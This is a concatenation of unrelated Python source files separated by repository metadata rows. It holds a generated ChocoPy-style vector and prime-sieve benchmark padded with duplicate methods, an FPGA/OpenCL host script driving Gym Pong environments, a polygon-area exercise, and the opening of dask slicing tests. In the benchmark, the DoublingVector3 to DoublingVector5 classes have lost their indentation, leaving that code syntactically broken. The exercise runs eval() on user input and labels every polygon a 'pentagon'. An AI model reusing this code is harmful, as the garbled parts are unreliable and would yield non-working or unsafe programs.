        x:int = 0
        for x in new_items:
            self.append(x)

    # Append every element of new_items in order (extra arguments unused)
    def append_all2(self:"Vector4", new_items: [int], new_items2: [int]) -> object:
        x:int = 0
        x2:int = 0
        for x in new_items:
            self.append(x)

    # Append every element of new_items in order (extra arguments unused)
    def append_all3(self:"Vector4", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
        x:int = 0
        x2:int = 0
        x3:int = 0
        for x in new_items:
            self.append(x)

    # Append every element of new_items in order (extra arguments unused)
    def append_all4(self:"Vector4", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int]) -> object:
        x:int = 0
        x2:int = 0
        x3:int = 0
        x4:int = 0
        for x in new_items:
            self.append(x)

    # Delete the element at idx, shifting later elements left
    def remove_at(self:"Vector4", idx: int) -> object:
        cur:int = 0
        if idx < 0:
            return
        cur = idx
        while cur < self.size - 1:
            self.items[cur] = self.items[cur + 1]
            cur = cur + 1
        self.size = self.size - 1

    # Delete the element at idx (extra arguments unused)
    def remove_at2(self:"Vector4", idx: int, idx2: int) -> object:
        cur:int = 0
        if idx < 0:
            return
        cur = idx
        while cur < self.size - 1:
            self.items[cur] = self.items[cur + 1]
            cur = cur + 1
        self.size = self.size - 1

    # Delete the element at idx (extra arguments unused)
    def remove_at3(self:"Vector4", idx: int, idx2: int, idx3: int) -> object:
        cur:int = 0
        if idx < 0:
            return
        cur = idx
        while cur < self.size - 1:
            self.items[cur] = self.items[cur + 1]
            cur = cur + 1
        self.size = self.size - 1

    # Delete the element at idx (extra arguments unused)
    def remove_at4(self:"Vector4", idx: int, idx2: int, idx3: int, idx4: int) -> object:
        cur:int = 0
        if idx < 0:
            return
        cur = idx
        while cur < self.size - 1:
            self.items[cur] = self.items[cur + 1]
            cur = cur + 1
        self.size = self.size - 1

    # Element stored at position idx
    def get(self:"Vector4", idx: int) -> int:
        return self.items[idx]

    # Element stored at position idx (extra arguments unused)
    def get2(self:"Vector4", idx: int, idx2: int) -> int:
        return self.items[idx]

    # Element stored at position idx (extra arguments unused)
    def get3(self:"Vector4", idx: int, idx2: int, idx3: int) -> int:
        return self.items[idx]

    # Element stored at position idx (extra arguments unused)
    def get4(self:"Vector4", idx: int, idx2: int, idx3: int, idx4: int) -> int:
        return self.items[idx]

    # Count of elements currently stored
    def length(self:"Vector4") -> int:
        return self.size

    # Count of elements currently stored
    def length2(self:"Vector4") -> int:
        return self.size

    # Count of elements currently stored
    def length3(self:"Vector4") -> int:
        return self.size

    # Count of elements currently stored
    def length4(self:"Vector4") -> int:
        return self.size
# A growable array of integers (benchmark variant with duplicated members)
class Vector5(object):
    items: [int] = None
    items2: [int] = None
    items3: [int] = None
    items4: [int] = None
    items5: [int] = None
    size: int = 0
    size2: int = 0
    size3: int = 0
    size4: int = 0
    size5: int = 0

    def __init__(self:"Vector5"):
        self.items = [0]

    # Number of backing slots currently allocated
    def capacity(self:"Vector5") -> int:
        return len(self.items)

    # Number of backing slots currently allocated
    def capacity2(self:"Vector5") -> int:
        return len(self.items)

    # Number of backing slots currently allocated
    def capacity3(self:"Vector5") -> int:
        return len(self.items)

    # Number of backing slots currently allocated
    def capacity4(self:"Vector5") -> int:
        return len(self.items)

    # Number of backing slots currently allocated
    def capacity5(self:"Vector5") -> int:
        return len(self.items)

    # Grow the backing storage by a single slot
    def increase_capacity(self:"Vector5") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Grow the backing storage by a single slot
    def increase_capacity2(self:"Vector5") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Grow the backing storage by a single slot
    def increase_capacity3(self:"Vector5") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Grow the backing storage by a single slot
    def increase_capacity4(self:"Vector5") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Grow the backing storage by a single slot
    def increase_capacity5(self:"Vector5") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Store item after the last occupied slot, growing if full
    def append(self:"Vector5", item: int) -> object:
        if self.capacity() == self.size:
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Store item after the last occupied slot (extra arguments unused)
    def append2(self:"Vector5", item: int, item2: int) -> object:
        if self.capacity() == self.size:
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Store item after the last occupied slot (extra arguments unused)
    def append3(self:"Vector5", item: int, item2: int, item3: int) -> object:
        if self.capacity() == self.size:
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Store item after the last occupied slot (extra arguments unused)
    def append4(self:"Vector5", item: int, item2: int, item3: int, item4: int) -> object:
        if self.capacity() == self.size:
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Store item after the last occupied slot (extra arguments unused)
    def append5(self:"Vector5", item: int, item2: int, item3: int, item4: int, item5: int) -> object:
        if self.capacity() == self.size:
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Append every element of new_items in order
    def append_all(self:"Vector5", new_items: [int]) -> object:
        x:int = 0
        for x in new_items:
            self.append(x)

    # Append every element of new_items in order (extra arguments unused)
    def append_all2(self:"Vector5", new_items: [int], new_items2: [int]) -> object:
        x:int = 0
        x2:int = 0
        for x in new_items:
            self.append(x)

    # Append every element of new_items in order (extra arguments unused)
    def append_all3(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
        x:int = 0
        x2:int = 0
        x3:int = 0
        for x in new_items:
            self.append(x)

    # Append every element of new_items in order (extra arguments unused)
    def append_all4(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int]) -> object:
        x:int = 0
        x2:int = 0
        x3:int = 0
        x4:int = 0
        for x in new_items:
            self.append(x)

    # Append every element of new_items in order (extra arguments unused)
    def append_all5(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int], new_items5: [int]) -> object:
        x:int = 0
        x2:int = 0
        x3:int = 0
        x4:int = 0
        x5:int = 0
        for x in new_items:
            self.append(x)

    # Delete the element at idx, shifting later elements left
    def remove_at(self:"Vector5", idx: int) -> object:
        cur:int = 0
        if idx < 0:
            return
        cur = idx
        while cur < self.size - 1:
            self.items[cur] = self.items[cur + 1]
            cur = cur + 1
        self.size = self.size - 1

    # Delete the element at idx (extra arguments unused)
    def remove_at2(self:"Vector5", idx: int, idx2: int) -> object:
        cur:int = 0
        if idx < 0:
            return
        cur = idx
        while cur < self.size - 1:
            self.items[cur] = self.items[cur + 1]
            cur = cur + 1
        self.size = self.size - 1

    # Delete the element at idx (extra arguments unused)
    def remove_at3(self:"Vector5", idx: int, idx2: int, idx3: int) -> object:
        cur:int = 0
        if idx < 0:
            return
        cur = idx
        while cur < self.size - 1:
            self.items[cur] = self.items[cur + 1]
            cur = cur + 1
        self.size = self.size - 1

    # Delete the element at idx (extra arguments unused)
    def remove_at4(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int) -> object:
        cur:int = 0
        if idx < 0:
            return
        cur = idx
        while cur < self.size - 1:
            self.items[cur] = self.items[cur + 1]
            cur = cur + 1
        self.size = self.size - 1

    # Delete the element at idx (extra arguments unused)
    def remove_at5(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int, idx5: int) -> object:
        cur:int = 0
        if idx < 0:
            return
        cur = idx
        while cur < self.size - 1:
            self.items[cur] = self.items[cur + 1]
            cur = cur + 1
        self.size = self.size - 1

    # Element stored at position idx
    def get(self:"Vector5", idx: int) -> int:
        return self.items[idx]

    # Element stored at position idx (extra arguments unused)
    def get2(self:"Vector5", idx: int, idx2: int) -> int:
        return self.items[idx]

    # Element stored at position idx (extra arguments unused)
    def get3(self:"Vector5", idx: int, idx2: int, idx3: int) -> int:
        return self.items[idx]

    # Element stored at position idx (extra arguments unused)
    def get4(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int) -> int:
        return self.items[idx]

    # Element stored at position idx (extra arguments unused)
    def get5(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int, idx5: int) -> int:
        return self.items[idx]

    # Count of elements currently stored
    def length(self:"Vector5") -> int:
        return self.size

    # Count of elements currently stored
    def length2(self:"Vector5") -> int:
        return self.size

    # Count of elements currently stored
    def length3(self:"Vector5") -> int:
        return self.size

    # Count of elements currently stored
    def length4(self:"Vector5") -> int:
        return self.size

    # Count of elements currently stored
    def length5(self:"Vector5") -> int:
        return self.size
# A faster (but more memory-consuming) implementation of vector
class DoublingVector(Vector):
    doubling_limit:int = 1000

    # Double the backing store while under the limit; past it, fall back
    # to the base class's one-slot-at-a-time growth
    def increase_capacity(self:"DoublingVector") -> int:
        if self.capacity() * 2 <= self.doubling_limit:
            self.items = self.items + self.items
        else:
            self.items = self.items + [0]
        return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector2(Vector):
    doubling_limit:int = 1000
    doubling_limit2:int = 1000

    # Double the backing store while under the limit; past it, fall back
    # to one-slot-at-a-time growth
    def increase_capacity(self:"DoublingVector2") -> int:
        if self.capacity() * 2 <= self.doubling_limit:
            self.items = self.items + self.items
        else:
            self.items = self.items + [0]
        return self.capacity()

    # Duplicate of increase_capacity (benchmark padding)
    def increase_capacity2(self:"DoublingVector2") -> int:
        if self.capacity() * 2 <= self.doubling_limit:
            self.items = self.items + self.items
        else:
            self.items = self.items + [0]
        return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector3(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector4(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
doubling_limit4:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity4(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector5(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
doubling_limit4:int = 1000
doubling_limit5:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity4(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity5(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Makes a vector holding the integers in the range [i, j).
def vrange(i:int, j:int) -> Vector:
    v:Vector = None
    v = DoublingVector()
    while i < j:
        v.append(i)
        i = i + 1
    return v
# Duplicate of vrange; the extra parameters and locals are unused
# (generated benchmark padding).
def vrange2(i:int, j:int, i2:int, j2:int) -> Vector:
    v:Vector = None
    v2:Vector = None
    v = DoublingVector()
    while i < j:
        v.append(i)
        i = i + 1
    return v
# Duplicate of vrange; extra parameters/locals unused.
def vrange3(i:int, j:int, i2:int, j2:int, i3:int, j3:int) -> Vector:
    v:Vector = None
    v2:Vector = None
    v3:Vector = None
    v = DoublingVector()
    while i < j:
        v.append(i)
        i = i + 1
    return v
# Duplicate of vrange; extra parameters/locals unused.
def vrange4(i:int, j:int, i2:int, j2:int, i3:int, j3:int, i4:int, j4:int) -> Vector:
    v:Vector = None
    v2:Vector = None
    v3:Vector = None
    v4:Vector = None
    v = DoublingVector()
    while i < j:
        v.append(i)
        i = i + 1
    return v
# Duplicate of vrange; extra parameters/locals unused.
def vrange5(i:int, j:int, i2:int, j2:int, i3:int, j3:int, i4:int, j4:int, i5:int, j5:int) -> Vector:
    v:Vector = None
    v2:Vector = None
    v3:Vector = None
    v4:Vector = None
    v5:Vector = None
    v = DoublingVector()
    while i < j:
        v.append(i)
        i = i + 1
    return v
# Sieve of Eratosthenes (not really): for each remaining value k,
# removes every later element divisible by k, so only primes of the
# seeded range survive. Mutates v in place.
def sieve(v:Vector) -> object:
    i:int = 0
    j:int = 0
    k:int = 0
    while i < v.length():
        k = v.get(i)
        j = i + 1
        while j < v.length():
            if v.get(j) % k == 0:
                v.remove_at(j)
            else:
                j = j + 1
        i = i + 1
# Duplicate of sieve; the extra parameters and locals are unused
# (generated benchmark padding).
def sieve2(v:Vector, v2:Vector) -> object:
    i:int = 0
    i2:int = 0
    j:int = 0
    j2:int = 0
    k:int = 0
    k2:int = 0
    while i < v.length():
        k = v.get(i)
        j = i + 1
        while j < v.length():
            if v.get(j) % k == 0:
                v.remove_at(j)
            else:
                j = j + 1
        i = i + 1
# Duplicate of sieve; extra parameters/locals unused.
def sieve3(v:Vector, v2:Vector, v3:Vector) -> object:
    i:int = 0
    i2:int = 0
    i3:int = 0
    j:int = 0
    j2:int = 0
    j3:int = 0
    k:int = 0
    k2:int = 0
    k3:int = 0
    while i < v.length():
        k = v.get(i)
        j = i + 1
        while j < v.length():
            if v.get(j) % k == 0:
                v.remove_at(j)
            else:
                j = j + 1
        i = i + 1
# Duplicate of sieve; extra parameters/locals unused.
def sieve4(v:Vector, v2:Vector, v3:Vector, v4:Vector) -> object:
    i:int = 0
    i2:int = 0
    i3:int = 0
    i4:int = 0
    j:int = 0
    j2:int = 0
    j3:int = 0
    j4:int = 0
    k:int = 0
    k2:int = 0
    k3:int = 0
    k4:int = 0
    while i < v.length():
        k = v.get(i)
        j = i + 1
        while j < v.length():
            if v.get(j) % k == 0:
                v.remove_at(j)
            else:
                j = j + 1
        i = i + 1
# Duplicate of sieve; extra parameters/locals unused.
def sieve5(v:Vector, v2:Vector, v3:Vector, v4:Vector, v5:Vector) -> object:
    i:int = 0
    i2:int = 0
    i3:int = 0
    i4:int = 0
    i5:int = 0
    j:int = 0
    j2:int = 0
    j3:int = 0
    j4:int = 0
    j5:int = 0
    k:int = 0
    k2:int = 0
    k3:int = 0
    k4:int = 0
    k5:int = 0
    while i < v.length():
        k = v.get(i)
        j = i + 1
        while j < v.length():
            if v.get(j) % k == 0:
                v.remove_at(j)
            else:
                j = j + 1
        i = i + 1
# Input parameter (n2..n5, v2..v5, i2..i5 are generated padding).
n:int = 50
n2:int = 50
n3:int = 50
n4:int = 50
n5:int = 50
# Data
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v5:Vector = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
# Crunch: fill [2, n) and sieve out the composites.
v = vrange(2, n)
v2 = vrange(2, n)
v3 = vrange(2, n)
v4 = vrange(2, n)
v5 = vrange(2, n)
sieve(v)
# Print the surviving (prime) values, one per line.
# BUG FIX: the loop bound was the unexpanded template hole `$Exp.length()`
# (a syntax error); the intended bound is the sieved vector's length.
while i < v.length():
    print(v.get(i))
    i = i + 1
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
bb4690badb9ddcd0e9c039859751fd826c910d68
|
7b9d1eba54fdb805252ec4e29907b77e57567091
|
/gym_host_src/demo_generate/host_program.py
|
36ee37d7e7d1a415a0cffafb74002b4f9c4a2530
|
[] |
no_license
|
nathanpeura/FGym_EE599
|
8bb7739ea6403b4c284c398d75965987bb8af8d4
|
57f4359d6ea120f92cda14d01c78b2d3b69fc936
|
refs/heads/main
| 2023-05-06T04:47:07.361125
| 2021-05-27T04:09:26
| 2021-05-27T04:09:26
| 354,163,600
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,388
|
py
|
import os, sys
import numpy as np
import pyopencl as cl
import time
os.environ["PYOPENCL_CTX"] = '1'
from stable_baselines3.common.env_util import make_vec_env
import matplotlib.pyplot as plt
import gym
################## User input ###########################
# use host_params.in to define the parameters
# episode_num = 3
# iteration_max = 10000
# parallel_env = 4
# Gym environment id used for every parallel worker.
environment = 'Pong-v4'
# FPGA bitstream programmed onto the OpenCL device in setup_device().
xclbin_kernel = "vadd_DDR_pong_1.xclbin"
# When True, generate_pre_exe_report() prints a pre-run summary.
generate_report = True
#########################################################
def read_in_params():
    """Read the run parameters from ``host_params.in``.

    The file is a space/newline separated key-value sequence
    (``n <N> t <T> m <M> k <K>``); the values at token positions
    1, 3, 5 and 7 are returned as strings, in that order.
    """
    with open('host_params.in', 'r') as cfg:
        tokens = cfg.read().replace('\n', ' ').split(' ')
    # Even slots hold the labels (n, t, m, k); odd slots the values.
    return [tokens[pos] for pos in (1, 3, 5, 7)]
# Parameters come back from host_params.in as strings.
[n_param,t_param,m_param,k_param] = read_in_params()
#assume this is what these params are
parallel_env = int(n_param)  # n: number of parallel Gym environments
iteration_max = int(t_param)  # t: max steps per episode
# NOTE(review): m_param is read but never used anywhere below.
episode_num = int(k_param)  # k: number of episodes to run
class RL_data:
    """Container for the rollout data exchanged with the Gym envs."""
    def __init__(self):
        # observation / reward / action come back from env.step();
        # doneVec tracks which parallel envs have finished the episode.
        self.observation, self.reward = [], []
        self.action, self.doneVec = [], []
def setup_device():
    """Create an OpenCL context, program the FPGA with the xclbin
    bitstream and return [ctx, queue, mem_flags, vadd_kernel].

    Relies on module globals: ``xclbin_kernel`` (bitstream path) and
    the PYOPENCL_CTX environment variable set at import time.
    """
    ctx = cl.create_some_context()
    queue = cl.CommandQueue(ctx)
    mf = cl.mem_flags
    # Platform index 1 is assumed to be the FPGA platform — TODO confirm.
    dev =cl.get_platforms()[1].get_devices()
    binary = open(xclbin_kernel, "rb").read()
    prg = cl.Program(ctx,dev,[binary])
    prg.build()
    print(dev)
    print("Device is programmed, testing...")
    # "vadd" is the kernel entry point compiled into the xclbin.
    krnl_vadd = cl.Kernel(prg, "vadd")
    return [ctx,queue,mf,krnl_vadd]
def generate_pre_exe_report(observation_flat,parallel_env,env):
    """Print a summary of environment and IO data sizes before the run.

    NOTE(review): this steps the vectorised env once with a dummy
    action vector, so it advances the episode state as a side effect.
    """
    print("\n########################")
    print("Pre-execution report\n")
    print("----------------------------")
    print("Number of parallel environments: ", parallel_env)
    print("Observation vector elements: ", len(observation_flat))
    print("Observation vector bytes: ", observation_flat.nbytes)
    action = np.full((parallel_env), 1) #dummy action vector
    action_output = env.action_space.sample()
    observation, reward, done, info = env.step(action)
    reward_flat = reward.flatten()
    print("----------------------------")
    print("Environment Space")
    print("Observation space: ", env.observation_space)
    print("Action space: ", env.action_space)
    print("----------------------------")
    print("Environment State and Observation Shape")
    print("Observation shape: ", observation.shape)
    print("Reward shape: ", reward.shape)
    print("----------------------------")
    print("Environment IO Data sizes")
    print("Observation element type: ", type(observation_flat[0]))
    print("Reward element type: ", type(reward_flat[0]))
    print("Action element type: ", type(action_output))
    print("----------------------------")
# ---- Setup: build the vectorised Gym envs and program the device ----
env = make_vec_env(environment, n_envs=parallel_env)
observation = env.reset()
observation_flat = observation.flatten()
size_array = len(observation_flat)*parallel_env
start_time = time.time()
[ctx,queue,mf,krnl_vadd] = setup_device()
setup_time = time.time()
if(generate_report):
    generate_pre_exe_report(observation_flat, parallel_env,env)
###### create output buffer, change this if your output is different than the type of observation
# output = np.full((parallel_env), np.uint8(1))
# NOTE(review): astype() is given a *value* (observation_flat[0]),
# not a dtype — presumably relies on numpy coercing it; verify, or
# use observation_flat.dtype for clarity.
output = np.full((parallel_env), 1).astype(observation_flat[0]) #(np.float32)
throwaway_time1 = time.time()
res_g = cl.Buffer(ctx, mf.WRITE_ONLY, output.nbytes)
setup_time = setup_time - start_time + (time.time() - throwaway_time1) #time it takes to create the buffers and the connection
#############################################
test_pf = True
action = np.full((parallel_env), 1)
total_gym_time = 0
total_vitis_time = 0
total_openCL_time = 0
test_data = RL_data()
list_rewards = []
list_episodes = []
list_iteration = []
iteration = 0
# ---- Main loop: step the envs, ship data to the kernel, compare ----
for x in range(episode_num):
    print("########## Episode number: ", x, " ##########")
    test_data.observation = env.reset()
    test_data.doneVec = np.full((parallel_env), False)
    for count in range(iteration_max): #how many iterations to complete, will likely finish when 'done' is true from env.step
        #####################################
        # create observation and reward from Gym
        start_time_gym = time.time()
        # action = env.action_space.sample()
        test_data.observation, test_data.reward, done, info = env.step(action)
        observation = test_data.observation.flatten()
        gym_time = time.time()
        observation[0] = np.random.randint(0,6) #first val is used as the action, just random number 0 to 5
        # print("iteration: ", count)
        test_data.reward[0] = (np.random.randint(0,6))
        test_data.reward = abs(test_data.reward.astype(np.float32)) #observation_flat[0])
        list_rewards.append(test_data.reward[0])
        list_iteration.append(iteration)
        list_episodes.append(x)
        # print("Reward: ", test_data.reward)
        #####################################
        #call kernel
        # Mark envs that just finished; stop the episode once all are done.
        for i in range(parallel_env):
            if done[i] or test_data.doneVec[i]:
                if not test_data.doneVec[i]:
                    print("Episode: ",x+1," Env ", i, " finished after {} timesteps".format(count))
                test_data.doneVec[i] = True
        if(test_data.doneVec.all()):
            break
        throwaway_time = time.time()
        obs_buf = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=observation)
        reward_buf = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=test_data.reward)
        openCL_time = time.time()
        krnl_vadd(queue, (1,), (1,), obs_buf, reward_buf, res_g, np.int32(size_array),np.int32(parallel_env)) #np.int32(reward[0]), np.int32(size_array),np.int32(parallel_env))
        kernel_time = time.time()
        res_np = np.empty_like(output)
        cl.enqueue_copy(queue, res_np, res_g)
        openCL_time_2 = openCL_time - throwaway_time + time.time() - kernel_time
        test_data.action = res_np
        vitis_time = kernel_time - openCL_time
        print("reward: ", test_data.reward)
        # Accumulate per-phase timing totals.
        gym_time -= start_time_gym
        total_gym_time += gym_time
        total_vitis_time += vitis_time
        total_openCL_time += openCL_time_2
        kernel_time = kernel_time - openCL_time
        for j in range(len(res_np)): #created to compare the output with the expected output
            if(res_np[j] != test_data.reward[j]):
                print("Not equal!")
                test_pf = False
                break
        iteration += 1
# ---- Reporting: write timings, print pass/fail, plot rewards ----
print("########## Test completed ##########")
total_time = total_gym_time + total_vitis_time + setup_time + total_openCL_time
f = open("data_out.txt", "w")
str_data = str(total_time-total_gym_time-total_vitis_time) + "\n" + str(total_time) + "\n"
f.write(str_data)
f.close()
if(test_pf):
    print("Test passed!")
else:
    print("Test failed!")
env.close()
###### generate plot of reward
fig, ax = plt.subplots(constrained_layout=True)
plt.scatter(list_iteration, list_rewards)
ax.set_title('Reward Vs Episodes')
ax.set_xlabel('Iterations')
ax.set_ylabel('Reward')
ax.set_ylim([0,15])
# Secondary x-axis labels iterations with their episode numbers.
secax = ax.twiny()
secax.set_xticks(list_episodes)
secax.set_xlabel("Episode")
for x in range(episode_num):
    plt.axvline(x, color='black')
plt.savefig("./inf_reward_plot.png")
|
[
"njpeura@gmail.com"
] |
njpeura@gmail.com
|
51e9fc0ea8214b1bd2cc148164c6b4ee4a963159
|
61dcd9b485bc5e6d07c4adf14f138eabaa9a23b5
|
/Own practice/3.2/3.5.py
|
1994d93572f6c634c3da216c8366c94cb132b244
|
[] |
no_license
|
bong1915016/Introduction-to-Programming-Using-Python
|
d442d2252d13b731f6cd9c6356032e8b90aba9a1
|
f23e19963183aba83d96d9d8a9af5690771b62c2
|
refs/heads/master
| 2020-09-25T03:09:34.384693
| 2019-11-28T17:33:28
| 2019-11-28T17:33:28
| 225,904,132
| 1
| 0
| null | 2019-12-04T15:56:55
| 2019-12-04T15:56:54
| null |
UTF-8
|
Python
| false
| false
| 574
|
py
|
"""
程式設計練習題 2.2-2.10 3.5 幾何:n多邊形面積.
正多邊行為帶有n個邊、各邊等長、各角度也相同的正多邊形,計算正多邊形面積的公式:
Area = (n * tan(pi / n)) / 4 * s ** 2
提示使用者輸入邊長,接著顯示其面積,以下是程式的執行結果:
```
Enter the side:5.5
The area of the pentagon is 52.04444136781625
```
"""
import math
n = eval(input("Enter the number of side:"))
s = eval(input("Enter the side:"))
area = (n * s ** 2) / (4 * math.tan(math.pi / n))
print("The area of the pentagon is", area)
|
[
"38396747+timmy61109@users.noreply.github.com"
] |
38396747+timmy61109@users.noreply.github.com
|
8133a16cd96532f6ca7047d4e587715a62563cb5
|
2f41e741b6185ca53f835e8fa2a388e142354f44
|
/lib/python2.7/site-packages/dask/array/tests/test_optimization.py
|
4b770203037e000c87b4d4038382fdb4dce2a098
|
[] |
no_license
|
honheil/pic-get
|
4ce7f58a5d5d34537942ccd24e9783af4f7f2b1a
|
b1317ae11fd99163a192303a3c43a9420c81bf2f
|
refs/heads/master
| 2022-10-15T21:36:06.890386
| 2017-03-18T21:35:22
| 2017-03-18T21:35:22
| 84,936,928
| 0
| 1
| null | 2022-10-09T09:50:36
| 2017-03-14T10:36:16
|
Python
|
UTF-8
|
Python
| false
| false
| 4,866
|
py
|
import pytest
pytest.importorskip('numpy')
from dask.optimize import fuse
from dask.array.optimization import (getitem, optimize, optimize_slices,
fuse_slice)
from dask.array.core import getarray, getarray_nofancy
# Nested getter tasks should fuse into the single equivalent getter.
def test_fuse_getitem():
    # Each (input, expected) pair: a nested getter task and the fused
    # task that optimize_slices should collapse it to.
    pairs = [((getarray, (getarray, 'x', slice(1000, 2000)), slice(15, 20)),
              (getarray, 'x', slice(1015, 1020))),
             ((getitem, (getarray, 'x', (slice(1000, 2000), slice(100, 200))),
               (slice(15, 20), slice(50, 60))),
              (getarray, 'x', (slice(1015, 1020), slice(150, 160)))),
             ((getitem, (getarray_nofancy, 'x', (slice(1000, 2000), slice(100, 200))),
               (slice(15, 20), slice(50, 60))),
              (getarray_nofancy, 'x', (slice(1015, 1020), slice(150, 160)))),
             ((getarray, (getarray, 'x', slice(1000, 2000)), 10),
              (getarray, 'x', 1010)),
             ((getitem, (getarray, 'x', (slice(1000, 2000), 10)),
               (slice(15, 20),)),
              (getarray, 'x', (slice(1015, 1020), 10))),
             ((getitem, (getarray_nofancy, 'x', (slice(1000, 2000), 10)),
               (slice(15, 20),)),
              (getarray_nofancy, 'x', (slice(1015, 1020), 10))),
             ((getarray, (getarray, 'x', (10, slice(1000, 2000))),
               (slice(15, 20), )),
              (getarray, 'x', (10, slice(1015, 1020)))),
             ((getarray, (getarray, 'x', (slice(1000, 2000), slice(100, 200))),
               (slice(None, None), slice(50, 60))),
              (getarray, 'x', (slice(1000, 2000), slice(150, 160)))),
             ((getarray, (getarray, 'x', (None, slice(None, None))),
               (slice(None, None), 5)),
              (getarray, 'x', (None, 5))),
             ((getarray, (getarray, 'x', (slice(1000, 2000), slice(10, 20))),
               (slice(5, 10),)),
              (getarray, 'x', (slice(1005, 1010), slice(10, 20)))),
             ((getitem, (getitem, 'x', (slice(1000, 2000),)),
               (slice(5, 10), slice(10, 20))),
              (getitem, 'x', (slice(1005, 1010), slice(10, 20))))]
    for inp, expected in pairs:
        result = optimize_slices({'y': inp})
        assert result == {'y': expected}
# The full optimize() pass fuses chained getters down to one task.
def test_optimize_with_getitem_fusion():
    dsk = {'a': 'some-array',
           'b': (getarray, 'a', (slice(10, 20), slice(100, 200))),
           'c': (getarray, 'b', (5, slice(50, 60)))}
    result = optimize(dsk, ['c'])
    expected = {'c': (getarray, 'some-array', (15, slice(150, 160)))}
    assert result == expected
# Chains of slices collapse; explicitly requested keys are preserved.
def test_optimize_slicing():
    dsk = {'a': (range, 10),
           'b': (getarray, 'a', (slice(None, None, None),)),
           'c': (getarray, 'b', (slice(None, None, None),)),
           'd': (getarray, 'c', (slice(0, 5, None),)),
           'e': (getarray, 'd', (slice(None, None, None),))}
    expected = {'e': (getarray, (range, 10), (slice(0, 5, None),))}
    result = optimize_slices(fuse(dsk, [])[0])
    assert result == expected
    # protect output keys
